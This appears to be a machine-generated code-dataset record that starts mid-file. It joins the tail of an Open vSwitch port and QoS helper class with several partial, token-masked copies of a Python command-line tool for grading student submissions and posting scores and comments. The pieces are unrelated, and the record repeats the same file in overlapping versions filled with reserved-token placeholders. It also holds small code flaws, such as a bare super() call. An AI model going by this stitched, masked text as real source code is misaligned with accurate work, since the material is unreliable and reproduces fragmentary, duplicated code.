OFPORT_RANGE_MAX:\n LOG.warning(\"ofport %(ofport)s for port %(port)s is invalid.\",\n {'ofport': ofport, 'port': port_name})\n return False\n\n return True\n\n def get_interface_by_id_with_specified_columns(self, port_id,\n specified_columns):\n columns = 
{'external_ids', 'name'}\n columns.update(specified_columns)\n ifaces = self.ovsdb.db_find(\n 'Interface', ('external_ids', '=', {'iface-id': port_id}),\n columns=columns).execute()\n\n for iface in ifaces:\n if (self.integration_bridge !=\n self._get_bridge_for_iface(iface['name'])):\n # iface-id is the port id in neutron, the same neutron port\n # might create multiple interfaces in different bridges\n continue\n return iface\n\n def get_port_ofport_by_id(self, port_id):\n iface = self.get_interface_by_id_with_specified_columns(\n port_id, {'name', 'ofport'})\n if iface and self._check_ofport(iface['name'], iface['ofport']):\n return iface['ofport']\n\n def get_local_port_mac_in_use(self, port_id):\n iface = self.get_interface_by_id_with_specified_columns(\n port_id, {'mac_in_use'})\n if iface and netaddr.valid_mac(iface['mac_in_use']):\n return iface['mac_in_use']\n\n def _get_port_name_by_id(self, port_id):\n ifaces = self.ovsdb.db_find(\n 'Interface', ('external_ids', '=', {'iface-id': port_id}),\n columns=['external_ids', 'name']).execute()\n for iface in ifaces:\n if (self.integration_bridge !=\n self._get_bridge_for_iface(iface['name'])):\n # iface-id is the port id in neutron, the same neutron port\n # might create multiple interfaces in different bridges\n continue\n\n return iface['name']\n\n def _gen_link_mapping(self, bridge1, bridge2,\n bridge1_link_name=None,\n bridge2_link_name=None):\n if bridge1_link_name is None:\n bridge1_link_name = \"%s-patch\" % bridge2\n if bridge2_link_name is None:\n bridge2_link_name = \"%s-patch\" % bridge1\n\n LOG.debug('genrated mappings {%(bridge1)s: %(link1)s,'\n ' %(bridge2)s: %(link2)s}',\n {'bridge1': bridge1,\n 'link1': bridge1_link_name,\n 'bridge2': bridge2,\n 'link2': bridge2_link_name})\n return (bridge1_link_name, bridge2_link_name)\n\n def map_patch_to_network(self, network, patch_name):\n self.bridge_mapping[network] = patch_name\n\n def get_phy_network_ofport(self, network):\n patch_name = 
self.bridge_mapping.get(network)\n if patch_name:\n return self.get_port_ofport(patch_name)\n\n def create_patch_pair(self, local_bridge, peer_bridge,\n local_link_name=None, peer_link_name=None):\n links = self._gen_link_mapping(\n local_bridge,\n peer_bridge,\n local_link_name,\n peer_link_name)\n self._create_patch_port(\n local_bridge,\n links[0],\n peer_bridge,\n links[1])\n self._create_patch_port(\n peer_bridge,\n links[1],\n local_bridge,\n links[0])\n return links\n\n def _create_patch_port(self, bridge, port, peer, peer_port):\n if cfg.CONF.df.enable_dpdk:\n self.ovsdb.add_br(bridge, datapath_type='netdev').execute()\n else:\n self.ovsdb.add_br(bridge, datapath_type='system').execute()\n if not self.patch_port_exist(port):\n self.ovsdb.add_patch_port(bridge, port, peer, peer_port).execute()\n\n def patch_port_exist(self, port):\n return 'patch' == self._db_get_val('Interface', port, 'type',\n check_error=False,\n log_errors=False)\n\n def get_port_ofport(self, port):\n return self._db_get_val('Interface', port, 'ofport',\n check_error=False, log_errors=False)\n\n def get_port_mac_in_use(self, port):\n return self._db_get_val('Interface', port, 'mac_in_use',\n check_error=False, log_errors=False)\n\n def get_port_qos(self, port_id):\n port_qoses = self.ovsdb.db_find(\n 'QoS', ('external_ids', '=', {'iface-id': port_id}),\n columns=['external_ids', '_uuid']).execute()\n if port_qoses:\n ovsdb_qos = port_qoses[0]\n external_ids = ovsdb_qos['external_ids']\n return qos.QosPolicy(\n id=external_ids.get('qos-id'),\n topic=external_ids.get('qos-topic'),\n version=external_ids.get('version'),\n )\n\n def set_port_qos(self, port_id, qos):\n port_name = self._get_port_name_by_id(port_id)\n if not port_name:\n return\n\n max_kbps = qos.get_max_kbps()\n max_burst_kbps = qos.get_max_burst_kbps()\n with self.ovsdb.transaction(check_error=True) as txn:\n qos_uuid = txn.add(self.ovsdb.create_qos(port_id, qos))\n txn.add(self.ovsdb.db_set('Interface', port_name,\n 
('ingress_policing_rate', max_kbps),\n ('ingress_policing_burst',\n max_burst_kbps)))\n txn.add(self.ovsdb.db_set('Port', port_name, ('qos', qos_uuid)))\n\n def update_port_qos(self, port_id, qos):\n port_name = self._get_port_name_by_id(port_id)\n if not port_name:\n return\n\n max_kbps = qos.get_max_kbps()\n max_burst_kbps = qos.get_max_burst_kbps()\n with self.ovsdb.transaction(check_error=True) as txn:\n txn.add(self.ovsdb.db_set('Interface', port_name,\n ('ingress_policing_rate', max_kbps),\n ('ingress_policing_burst',\n max_burst_kbps)))\n txn.add(self.ovsdb.update_qos(port_id, qos))\n\n def clear_port_qos(self, port_id):\n port_name = self._get_port_name_by_id(port_id)\n if not port_name:\n return\n\n with self.ovsdb.transaction(check_error=True) as txn:\n txn.add(self.ovsdb.db_set('Interface', port_name,\n ('ingress_policing_rate', 0),\n ('ingress_policing_burst', 0)))\n txn.add(self.ovsdb.db_set('Port', port_name, ('qos', [])))\n txn.add(self.ovsdb.delete_qos(port_id))\n\n def delete_port_qos_and_queue(self, port_id):\n self.ovsdb.delete_qos(port_id).execute()\n\n def get_vtp_ofport(self, tunnel_type):\n return self.get_port_ofport(tunnel_type + '-vtp')\n", "step-ids": [ 18, 23, 25, 27, 35 ] }
[ 18, 23, 25, 27, 35 ]
<|reserved_special_token_0|> class Grade(NamedTuple): score: int message: str comments: List[Comment] def clear(): os.system('cls' if os.name == 'nt' else 'clear') <|reserved_special_token_0|> def complete(comment): if comment.fields: print('Please provide supplementary information:') field_vals = {} for field in comment.fields: q = {'type': 'input', 'name': 'field', 'message': field + ':'} response = wrapped_prompt(q) field_vals[field] = response['field'] complete_text = comment.comment.format(**field_vals) q = {'type': 'input', 'name': 'final', 'message': 'Final message', 'default': complete_text} response = wrapped_prompt(q) return Comment(comment.line_num, response['final']) def add_comment(accepted_comments, new_comment): if not new_comment: return if new_comment.line_num not in accepted_comments: accepted_comments[new_comment.line_num] = [] accepted_comments[new_comment.line_num].append(new_comment) class Interrupt(Exception): def __init__(self, cmd): super() self.cmd = cmd <|reserved_special_token_0|> def wrapped_input(q): try: ret = input(q) except KeyboardInterrupt: return receive_command() return ret <|reserved_special_token_0|> def grade_backup(problems): comments = [] try: for name, problem in problems.items(): comments.extend(grade_problem(name, problem)) score, message = grade(comments) print(message) q = {'type': 'confirm', 'name': 'ok', 'message': 'Does this grade look reasonable?'} response = wrapped_prompt(q) return Grade(score, message, comments) except Interrupt as e: if e.cmd == 'reset': return grade_backup(problems) raise def grade_problem(name, problem): readline.set_completer(template_completer(name)) try: accepted_comments = {} for comment in problem.comments: try: display_code_with_accepted_and_potential_comments(name, problem, accepted_comments, comment) print(f'{Fore.CYAN}Potential comment: {Style.RESET_ALL}') print( f'{Fore.GREEN}{comment.line_num}{Style.RESET_ALL} {comment.comment}' ) q = {'type': 'confirm', 'name': 'ok', 'message': 
'Add comment', 'default': True} response = wrapped_prompt(q) if response['ok']: add_comment(accepted_comments, complete(comment)) except Interrupt as e: if e.cmd == 'cancel': continue raise while True: try: display_code_with_accepted_and_potential_comments(name, problem, accepted_comments) response = wrapped_input( f'? {Style.BRIGHT} Custom comment type: {Style.RESET_ALL}') if not response: q = {'type': 'confirm', 'name': 'ok', 'message': 'Go to next question?', 'default': True} response = wrapped_prompt(q) if response['ok']: break continue if response not in templates: print( f'{Fore.RED} Template {response} not found! {Style.RESET_ALL}' ) continue text = templates[response] q = {'type': 'input', 'name': 'line_num', 'message': 'Line number:'} response = wrapped_prompt(q) try: line_num = int(response['line_num']) except ValueError: print( f"{Fore.RED} Expected a number, received {response['line_num']} not found! {Style.RESET_ALL}" ) continue if text: fields = list(set(re.findall('{(.*?)}', text))) comment = Comment(line_num, text, fields) add_comment(accepted_comments, complete(comment)) else: q = {'type': 'input', 'name': 'text', 'message': 'Comment:' } response = wrapped_prompt(q) comment = Comment(line_num, response['text'], []) add_comment(accepted_comments, comment) except Interrupt as e: if e.cmd == 'cancel': continue raise print() return list(sum(accepted_comments.values(), [])) except Interrupt as e: if e.cmd == 'clear': return grade_problem(name, problem) raise <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> class Grade(NamedTuple): score: int message: str comments: List[Comment] def clear(): os.system('cls' if os.name == 'nt' else 'clear') def display_code_with_accepted_and_potential_comments(name, problem, accepted_comments, curr_comment=None): clear() print(f'Problem: {name}') highlighted_code = highlight(problem.code, PythonLexer(), TerminalFormatter()) for i, line in enumerate(highlighted_code.split('\n')): 
line_num = problem.initial_line_number + i if (line_num in accepted_comments or curr_comment and line_num == curr_comment.line_num): print() print(f'{Fore.GREEN}{line_num} {Style.RESET_ALL}{line}') if (line_num in accepted_comments or curr_comment and line_num == curr_comment.line_num): indent_level = len(line) - len(line.strip()) + 3 if line_num in accepted_comments: for accepted_comment in accepted_comments[line_num]: print(Fore.MAGENTA + ' ' * indent_level + '# ' + accepted_comment.comment) if curr_comment and line_num == curr_comment.line_num: print(Fore.RED + Style.BRIGHT + ' ' * indent_level + '# ' + curr_comment.comment) print() print() def complete(comment): if comment.fields: print('Please provide supplementary information:') field_vals = {} for field in comment.fields: q = {'type': 'input', 'name': 'field', 'message': field + ':'} response = wrapped_prompt(q) field_vals[field] = response['field'] complete_text = comment.comment.format(**field_vals) q = {'type': 'input', 'name': 'final', 'message': 'Final message', 'default': complete_text} response = wrapped_prompt(q) return Comment(comment.line_num, response['final']) def add_comment(accepted_comments, new_comment): if not new_comment: return if new_comment.line_num not in accepted_comments: accepted_comments[new_comment.line_num] = [] accepted_comments[new_comment.line_num].append(new_comment) class Interrupt(Exception): def __init__(self, cmd): super() self.cmd = cmd def wrapped_prompt(q): ret = prompt([q]) if not ret: receive_command() return ret def wrapped_input(q): try: ret = input(q) except KeyboardInterrupt: return receive_command() return ret def receive_command(): inp = input( f""" cancel = cancel this comment clear = clear all question comments reset = reset all student comments ? 
{Style.BRIGHT}{Fore.RED}command: {Style.RESET_ALL}""" ) raise Interrupt(inp) <|reserved_special_token_0|> def grade_backup(problems): comments = [] try: for name, problem in problems.items(): comments.extend(grade_problem(name, problem)) score, message = grade(comments) print(message) q = {'type': 'confirm', 'name': 'ok', 'message': 'Does this grade look reasonable?'} response = wrapped_prompt(q) return Grade(score, message, comments) except Interrupt as e: if e.cmd == 'reset': return grade_backup(problems) raise def grade_problem(name, problem): readline.set_completer(template_completer(name)) try: accepted_comments = {} for comment in problem.comments: try: display_code_with_accepted_and_potential_comments(name, problem, accepted_comments, comment) print(f'{Fore.CYAN}Potential comment: {Style.RESET_ALL}') print( f'{Fore.GREEN}{comment.line_num}{Style.RESET_ALL} {comment.comment}' ) q = {'type': 'confirm', 'name': 'ok', 'message': 'Add comment', 'default': True} response = wrapped_prompt(q) if response['ok']: add_comment(accepted_comments, complete(comment)) except Interrupt as e: if e.cmd == 'cancel': continue raise while True: try: display_code_with_accepted_and_potential_comments(name, problem, accepted_comments) response = wrapped_input( f'? {Style.BRIGHT} Custom comment type: {Style.RESET_ALL}') if not response: q = {'type': 'confirm', 'name': 'ok', 'message': 'Go to next question?', 'default': True} response = wrapped_prompt(q) if response['ok']: break continue if response not in templates: print( f'{Fore.RED} Template {response} not found! {Style.RESET_ALL}' ) continue text = templates[response] q = {'type': 'input', 'name': 'line_num', 'message': 'Line number:'} response = wrapped_prompt(q) try: line_num = int(response['line_num']) except ValueError: print( f"{Fore.RED} Expected a number, received {response['line_num']} not found! 
{Style.RESET_ALL}" ) continue if text: fields = list(set(re.findall('{(.*?)}', text))) comment = Comment(line_num, text, fields) add_comment(accepted_comments, complete(comment)) else: q = {'type': 'input', 'name': 'text', 'message': 'Comment:' } response = wrapped_prompt(q) comment = Comment(line_num, response['text'], []) add_comment(accepted_comments, comment) except Interrupt as e: if e.cmd == 'cancel': continue raise print() return list(sum(accepted_comments.values(), [])) except Interrupt as e: if e.cmd == 'clear': return grade_problem(name, problem) raise <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> class Grade(NamedTuple): score: int message: str comments: List[Comment] def clear(): os.system('cls' if os.name == 'nt' else 'clear') def display_code_with_accepted_and_potential_comments(name, problem, accepted_comments, curr_comment=None): clear() print(f'Problem: {name}') highlighted_code = highlight(problem.code, PythonLexer(), TerminalFormatter()) for i, line in enumerate(highlighted_code.split('\n')): line_num = problem.initial_line_number + i if (line_num in accepted_comments or curr_comment and line_num == curr_comment.line_num): print() print(f'{Fore.GREEN}{line_num} {Style.RESET_ALL}{line}') if (line_num in accepted_comments or curr_comment and line_num == curr_comment.line_num): indent_level = len(line) - len(line.strip()) + 3 if line_num in accepted_comments: for accepted_comment in accepted_comments[line_num]: print(Fore.MAGENTA + ' ' * indent_level + '# ' + accepted_comment.comment) if curr_comment and line_num == curr_comment.line_num: print(Fore.RED + Style.BRIGHT + ' ' * indent_level + '# ' + curr_comment.comment) print() print() def complete(comment): if comment.fields: print('Please provide supplementary information:') field_vals = {} for field in comment.fields: q = {'type': 'input', 'name': 'field', 'message': field + ':'} response = wrapped_prompt(q) field_vals[field] = response['field'] 
complete_text = comment.comment.format(**field_vals) q = {'type': 'input', 'name': 'final', 'message': 'Final message', 'default': complete_text} response = wrapped_prompt(q) return Comment(comment.line_num, response['final']) def add_comment(accepted_comments, new_comment): if not new_comment: return if new_comment.line_num not in accepted_comments: accepted_comments[new_comment.line_num] = [] accepted_comments[new_comment.line_num].append(new_comment) class Interrupt(Exception): def __init__(self, cmd): super() self.cmd = cmd def wrapped_prompt(q): ret = prompt([q]) if not ret: receive_command() return ret def wrapped_input(q): try: ret = input(q) except KeyboardInterrupt: return receive_command() return ret def receive_command(): inp = input( f""" cancel = cancel this comment clear = clear all question comments reset = reset all student comments ? {Style.BRIGHT}{Fore.RED}command: {Style.RESET_ALL}""" ) raise Interrupt(inp) def main(): readline.parse_and_bind('tab: complete') readline.set_completer_delims('') print('cli.py main') for id in get_backup_ids(): try: code = get_backup_code(id) problems = get_problems(code) except Exception: print( f'{Fore.RED}An exception occurred while processing backup id #{id}' , file=sys.stderr) traceback.print_exc(file=sys.stderr) print(f'{Style.RESET_ALL}') continue grade = grade_backup(problems) for comment in grade.comments: print(comment) assert not comment.fields, 'fields not substituted!' 
submit_comment(id, comment.line_num, comment.comment) submit_grade(id, grade.score, grade.message) def grade_backup(problems): comments = [] try: for name, problem in problems.items(): comments.extend(grade_problem(name, problem)) score, message = grade(comments) print(message) q = {'type': 'confirm', 'name': 'ok', 'message': 'Does this grade look reasonable?'} response = wrapped_prompt(q) return Grade(score, message, comments) except Interrupt as e: if e.cmd == 'reset': return grade_backup(problems) raise def grade_problem(name, problem): readline.set_completer(template_completer(name)) try: accepted_comments = {} for comment in problem.comments: try: display_code_with_accepted_and_potential_comments(name, problem, accepted_comments, comment) print(f'{Fore.CYAN}Potential comment: {Style.RESET_ALL}') print( f'{Fore.GREEN}{comment.line_num}{Style.RESET_ALL} {comment.comment}' ) q = {'type': 'confirm', 'name': 'ok', 'message': 'Add comment', 'default': True} response = wrapped_prompt(q) if response['ok']: add_comment(accepted_comments, complete(comment)) except Interrupt as e: if e.cmd == 'cancel': continue raise while True: try: display_code_with_accepted_and_potential_comments(name, problem, accepted_comments) response = wrapped_input( f'? {Style.BRIGHT} Custom comment type: {Style.RESET_ALL}') if not response: q = {'type': 'confirm', 'name': 'ok', 'message': 'Go to next question?', 'default': True} response = wrapped_prompt(q) if response['ok']: break continue if response not in templates: print( f'{Fore.RED} Template {response} not found! {Style.RESET_ALL}' ) continue text = templates[response] q = {'type': 'input', 'name': 'line_num', 'message': 'Line number:'} response = wrapped_prompt(q) try: line_num = int(response['line_num']) except ValueError: print( f"{Fore.RED} Expected a number, received {response['line_num']} not found! 
{Style.RESET_ALL}" ) continue if text: fields = list(set(re.findall('{(.*?)}', text))) comment = Comment(line_num, text, fields) add_comment(accepted_comments, complete(comment)) else: q = {'type': 'input', 'name': 'text', 'message': 'Comment:' } response = wrapped_prompt(q) comment = Comment(line_num, response['text'], []) add_comment(accepted_comments, comment) except Interrupt as e: if e.cmd == 'cancel': continue raise print() return list(sum(accepted_comments.values(), [])) except Interrupt as e: if e.cmd == 'clear': return grade_problem(name, problem) raise <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> parser.add_argument('proj', help= "Run 'python3 cli.py <proj>', where <proj> is one of the following: hog cats ants scheme" ) <|reserved_special_token_0|> parser.add_argument('proj', help= "Run 'python3 cli.py <proj>', where <proj> is one of the following: hog cats ants scheme" ) <|reserved_special_token_0|> class Grade(NamedTuple): score: int message: str comments: List[Comment] def clear(): os.system('cls' if os.name == 'nt' else 'clear') def display_code_with_accepted_and_potential_comments(name, problem, accepted_comments, curr_comment=None): clear() print(f'Problem: {name}') highlighted_code = highlight(problem.code, PythonLexer(), TerminalFormatter()) for i, line in enumerate(highlighted_code.split('\n')): line_num = problem.initial_line_number + i if (line_num in accepted_comments or curr_comment and line_num == curr_comment.line_num): print() print(f'{Fore.GREEN}{line_num} {Style.RESET_ALL}{line}') if (line_num in accepted_comments or curr_comment and line_num == curr_comment.line_num): indent_level = len(line) - len(line.strip()) + 3 if line_num in accepted_comments: for accepted_comment in accepted_comments[line_num]: print(Fore.MAGENTA + ' ' * indent_level + '# ' + accepted_comment.comment) if curr_comment and line_num == curr_comment.line_num: print(Fore.RED + Style.BRIGHT + ' ' * indent_level + '# ' + 
curr_comment.comment) print() print() def complete(comment): if comment.fields: print('Please provide supplementary information:') field_vals = {} for field in comment.fields: q = {'type': 'input', 'name': 'field', 'message': field + ':'} response = wrapped_prompt(q) field_vals[field] = response['field'] complete_text = comment.comment.format(**field_vals) q = {'type': 'input', 'name': 'final', 'message': 'Final message', 'default': complete_text} response = wrapped_prompt(q) return Comment(comment.line_num, response['final']) def add_comment(accepted_comments, new_comment): if not new_comment: return if new_comment.line_num not in accepted_comments: accepted_comments[new_comment.line_num] = [] accepted_comments[new_comment.line_num].append(new_comment) class Interrupt(Exception): def __init__(self, cmd): super() self.cmd = cmd def wrapped_prompt(q): ret = prompt([q]) if not ret: receive_command() return ret def wrapped_input(q): try: ret = input(q) except KeyboardInterrupt: return receive_command() return ret def receive_command(): inp = input( f""" cancel = cancel this comment clear = clear all question comments reset = reset all student comments ? {Style.BRIGHT}{Fore.RED}command: {Style.RESET_ALL}""" ) raise Interrupt(inp) def main(): readline.parse_and_bind('tab: complete') readline.set_completer_delims('') print('cli.py main') for id in get_backup_ids(): try: code = get_backup_code(id) problems = get_problems(code) except Exception: print( f'{Fore.RED}An exception occurred while processing backup id #{id}' , file=sys.stderr) traceback.print_exc(file=sys.stderr) print(f'{Style.RESET_ALL}') continue grade = grade_backup(problems) for comment in grade.comments: print(comment) assert not comment.fields, 'fields not substituted!' 
submit_comment(id, comment.line_num, comment.comment) submit_grade(id, grade.score, grade.message) def grade_backup(problems): comments = [] try: for name, problem in problems.items(): comments.extend(grade_problem(name, problem)) score, message = grade(comments) print(message) q = {'type': 'confirm', 'name': 'ok', 'message': 'Does this grade look reasonable?'} response = wrapped_prompt(q) return Grade(score, message, comments) except Interrupt as e: if e.cmd == 'reset': return grade_backup(problems) raise def grade_problem(name, problem): readline.set_completer(template_completer(name)) try: accepted_comments = {} for comment in problem.comments: try: display_code_with_accepted_and_potential_comments(name, problem, accepted_comments, comment) print(f'{Fore.CYAN}Potential comment: {Style.RESET_ALL}') print( f'{Fore.GREEN}{comment.line_num}{Style.RESET_ALL} {comment.comment}' ) q = {'type': 'confirm', 'name': 'ok', 'message': 'Add comment', 'default': True} response = wrapped_prompt(q) if response['ok']: add_comment(accepted_comments, complete(comment)) except Interrupt as e: if e.cmd == 'cancel': continue raise while True: try: display_code_with_accepted_and_potential_comments(name, problem, accepted_comments) response = wrapped_input( f'? {Style.BRIGHT} Custom comment type: {Style.RESET_ALL}') if not response: q = {'type': 'confirm', 'name': 'ok', 'message': 'Go to next question?', 'default': True} response = wrapped_prompt(q) if response['ok']: break continue if response not in templates: print( f'{Fore.RED} Template {response} not found! {Style.RESET_ALL}' ) continue text = templates[response] q = {'type': 'input', 'name': 'line_num', 'message': 'Line number:'} response = wrapped_prompt(q) try: line_num = int(response['line_num']) except ValueError: print( f"{Fore.RED} Expected a number, received {response['line_num']} not found! 
{Style.RESET_ALL}" ) continue if text: fields = list(set(re.findall('{(.*?)}', text))) comment = Comment(line_num, text, fields) add_comment(accepted_comments, complete(comment)) else: q = {'type': 'input', 'name': 'text', 'message': 'Comment:' } response = wrapped_prompt(q) comment = Comment(line_num, response['text'], []) add_comment(accepted_comments, comment) except Interrupt as e: if e.cmd == 'cancel': continue raise print() return list(sum(accepted_comments.values(), [])) except Interrupt as e: if e.cmd == 'clear': return grade_problem(name, problem) raise if __name__ == '__main__': try: main() except: print(f'{Style.RESET_ALL}') <|reserved_special_token_1|> import os import re import sys import traceback import readline from typing import NamedTuple, List from PyInquirer import prompt from pygments import highlight from pygments.formatters.terminal import TerminalFormatter from pygments.lexers.python import PythonLexer import argparse parser = argparse.ArgumentParser(description='Enter project endpoint') parser.add_argument("proj", help="Run 'python3 cli.py <proj>', where <proj> is one of the following: hog cats ants scheme") args = parser.parse_args() proj = args.proj from analyzer import get_problems, Comment from finalizing import grade from ok_interface import get_backup_ids, get_backup_code, submit_comment, submit_grade from colorama import Fore, Style from templates import template_completer, templates import argparse import config parser = argparse.ArgumentParser(description='Enter project endpoint') parser.add_argument("proj", help="Run 'python3 cli.py <proj>', where <proj> is one of the following: hog cats ants scheme") args = parser.parse_args() config.proj = args.proj class Grade(NamedTuple): score: int message: str comments: List[Comment] def clear(): os.system("cls" if os.name == "nt" else "clear") def display_code_with_accepted_and_potential_comments( name, problem, accepted_comments, curr_comment=None ): clear() print(f"Problem: {name}") 
highlighted_code = highlight(problem.code, PythonLexer(), TerminalFormatter()) for i, line in enumerate(highlighted_code.split("\n")): line_num = problem.initial_line_number + i if line_num in accepted_comments or ( curr_comment and line_num == curr_comment.line_num ): print() print(f"{Fore.GREEN}{line_num} {Style.RESET_ALL}{line}") if line_num in accepted_comments or ( curr_comment and line_num == curr_comment.line_num ): indent_level = len(line) - len(line.strip()) + 3 if line_num in accepted_comments: for accepted_comment in accepted_comments[line_num]: print( Fore.MAGENTA + " " * indent_level + "# " + accepted_comment.comment ) if curr_comment and line_num == curr_comment.line_num: print( Fore.RED + Style.BRIGHT + " " * indent_level + "# " + curr_comment.comment ) print() print() def complete(comment): if comment.fields: print("Please provide supplementary information:") field_vals = {} for field in comment.fields: q = {"type": "input", "name": "field", "message": field + ":"} response = wrapped_prompt(q) field_vals[field] = response["field"] complete_text = comment.comment.format(**field_vals) q = { "type": "input", "name": "final", "message": "Final message", "default": complete_text, } response = wrapped_prompt(q) return Comment(comment.line_num, response["final"]) def add_comment(accepted_comments, new_comment): if not new_comment: return if new_comment.line_num not in accepted_comments: accepted_comments[new_comment.line_num] = [] accepted_comments[new_comment.line_num].append(new_comment) class Interrupt(Exception): def __init__(self, cmd): super() self.cmd = cmd def wrapped_prompt(q): ret = prompt([q]) if not ret: receive_command() return ret def wrapped_input(q): try: ret = input(q) except KeyboardInterrupt: return receive_command() return ret def receive_command(): inp = input( f"\n\n" f"cancel = cancel this comment\n" f"clear = clear all question comments\n" f"reset = reset all student comments\n" f"? 
{Style.BRIGHT}{Fore.RED}command: {Style.RESET_ALL}" ) raise Interrupt(inp) def main(): readline.parse_and_bind("tab: complete") readline.set_completer_delims("") print("cli.py main") for id in get_backup_ids(): try: code = get_backup_code(id) problems = get_problems(code) except Exception: print( f"{Fore.RED}An exception occurred while processing backup id #{id}", file=sys.stderr, ) traceback.print_exc(file=sys.stderr) print(f"{Style.RESET_ALL}") continue grade = grade_backup(problems) for comment in grade.comments: print(comment) assert not comment.fields, "fields not substituted!" submit_comment(id, comment.line_num, comment.comment) submit_grade(id, grade.score, grade.message) def grade_backup(problems): comments = [] try: for name, problem in problems.items(): comments.extend(grade_problem(name, problem)) score, message = grade(comments) print(message) q = { "type": "confirm", "name": "ok", "message": "Does this grade look reasonable?", } response = wrapped_prompt(q) return Grade(score, message, comments) except Interrupt as e: if e.cmd == "reset": return grade_backup(problems) raise def grade_problem(name, problem): readline.set_completer(template_completer(name)) try: accepted_comments = {} for comment in problem.comments: try: display_code_with_accepted_and_potential_comments( name, problem, accepted_comments, comment ) print(f"{Fore.CYAN}Potential comment: {Style.RESET_ALL}") print( f"{Fore.GREEN}{comment.line_num}{Style.RESET_ALL} {comment.comment}" ) q = { "type": "confirm", "name": "ok", "message": "Add comment", "default": True, } response = wrapped_prompt(q) if response["ok"]: add_comment(accepted_comments, complete(comment)) except Interrupt as e: if e.cmd == "cancel": continue raise while True: try: display_code_with_accepted_and_potential_comments( name, problem, accepted_comments ) response = wrapped_input( f"? 
{Style.BRIGHT} Custom comment type: {Style.RESET_ALL}" ) if not response: q = { "type": "confirm", "name": "ok", "message": "Go to next question?", "default": True, } response = wrapped_prompt(q) if response["ok"]: break continue if response not in templates: print( f"{Fore.RED} Template {response} not found! {Style.RESET_ALL}" ) continue text = templates[response] q = {"type": "input", "name": "line_num", "message": "Line number:"} response = wrapped_prompt(q) try: line_num = int(response["line_num"]) except ValueError: print( f"{Fore.RED} Expected a number, received {response['line_num']} not found! {Style.RESET_ALL}" ) continue if text: fields = list(set(re.findall(r"{(.*?)}", text))) comment = Comment(line_num, text, fields) add_comment(accepted_comments, complete(comment)) else: q = {"type": "input", "name": "text", "message": "Comment:"} response = wrapped_prompt(q) comment = Comment(line_num, response["text"], []) add_comment(accepted_comments, comment) except Interrupt as e: if e.cmd == "cancel": continue raise print() return list(sum(accepted_comments.values(), [])) except Interrupt as e: if e.cmd == "clear": return grade_problem(name, problem) raise if __name__ == "__main__": try: main() except: print(f"{Style.RESET_ALL}")
flexible
{ "blob_id": "bec3d8546cd7d27f7da48f5658480cf17c36a255", "index": 9462, "step-1": "<mask token>\n\n\nclass Grade(NamedTuple):\n score: int\n message: str\n comments: List[Comment]\n\n\ndef clear():\n os.system('cls' if os.name == 'nt' else 'clear')\n\n\n<mask token>\n\n\ndef complete(comment):\n if comment.fields:\n print('Please provide supplementary information:')\n field_vals = {}\n for field in comment.fields:\n q = {'type': 'input', 'name': 'field', 'message': field + ':'}\n response = wrapped_prompt(q)\n field_vals[field] = response['field']\n complete_text = comment.comment.format(**field_vals)\n q = {'type': 'input', 'name': 'final', 'message': 'Final message',\n 'default': complete_text}\n response = wrapped_prompt(q)\n return Comment(comment.line_num, response['final'])\n\n\ndef add_comment(accepted_comments, new_comment):\n if not new_comment:\n return\n if new_comment.line_num not in accepted_comments:\n accepted_comments[new_comment.line_num] = []\n accepted_comments[new_comment.line_num].append(new_comment)\n\n\nclass Interrupt(Exception):\n\n def __init__(self, cmd):\n super()\n self.cmd = cmd\n\n\n<mask token>\n\n\ndef wrapped_input(q):\n try:\n ret = input(q)\n except KeyboardInterrupt:\n return receive_command()\n return ret\n\n\n<mask token>\n\n\ndef grade_backup(problems):\n comments = []\n try:\n for name, problem in problems.items():\n comments.extend(grade_problem(name, problem))\n score, message = grade(comments)\n print(message)\n q = {'type': 'confirm', 'name': 'ok', 'message':\n 'Does this grade look reasonable?'}\n response = wrapped_prompt(q)\n return Grade(score, message, comments)\n except Interrupt as e:\n if e.cmd == 'reset':\n return grade_backup(problems)\n raise\n\n\ndef grade_problem(name, problem):\n readline.set_completer(template_completer(name))\n try:\n accepted_comments = {}\n for comment in problem.comments:\n try:\n display_code_with_accepted_and_potential_comments(name,\n problem, accepted_comments, comment)\n 
print(f'{Fore.CYAN}Potential comment: {Style.RESET_ALL}')\n print(\n f'{Fore.GREEN}{comment.line_num}{Style.RESET_ALL} {comment.comment}'\n )\n q = {'type': 'confirm', 'name': 'ok', 'message':\n 'Add comment', 'default': True}\n response = wrapped_prompt(q)\n if response['ok']:\n add_comment(accepted_comments, complete(comment))\n except Interrupt as e:\n if e.cmd == 'cancel':\n continue\n raise\n while True:\n try:\n display_code_with_accepted_and_potential_comments(name,\n problem, accepted_comments)\n response = wrapped_input(\n f'? {Style.BRIGHT} Custom comment type: {Style.RESET_ALL}')\n if not response:\n q = {'type': 'confirm', 'name': 'ok', 'message':\n 'Go to next question?', 'default': True}\n response = wrapped_prompt(q)\n if response['ok']:\n break\n continue\n if response not in templates:\n print(\n f'{Fore.RED} Template {response} not found! {Style.RESET_ALL}'\n )\n continue\n text = templates[response]\n q = {'type': 'input', 'name': 'line_num', 'message':\n 'Line number:'}\n response = wrapped_prompt(q)\n try:\n line_num = int(response['line_num'])\n except ValueError:\n print(\n f\"{Fore.RED} Expected a number, received {response['line_num']} not found! 
{Style.RESET_ALL}\"\n )\n continue\n if text:\n fields = list(set(re.findall('{(.*?)}', text)))\n comment = Comment(line_num, text, fields)\n add_comment(accepted_comments, complete(comment))\n else:\n q = {'type': 'input', 'name': 'text', 'message': 'Comment:'\n }\n response = wrapped_prompt(q)\n comment = Comment(line_num, response['text'], [])\n add_comment(accepted_comments, comment)\n except Interrupt as e:\n if e.cmd == 'cancel':\n continue\n raise\n print()\n return list(sum(accepted_comments.values(), []))\n except Interrupt as e:\n if e.cmd == 'clear':\n return grade_problem(name, problem)\n raise\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\nclass Grade(NamedTuple):\n score: int\n message: str\n comments: List[Comment]\n\n\ndef clear():\n os.system('cls' if os.name == 'nt' else 'clear')\n\n\ndef display_code_with_accepted_and_potential_comments(name, problem,\n accepted_comments, curr_comment=None):\n clear()\n print(f'Problem: {name}')\n highlighted_code = highlight(problem.code, PythonLexer(),\n TerminalFormatter())\n for i, line in enumerate(highlighted_code.split('\\n')):\n line_num = problem.initial_line_number + i\n if (line_num in accepted_comments or curr_comment and line_num ==\n curr_comment.line_num):\n print()\n print(f'{Fore.GREEN}{line_num} 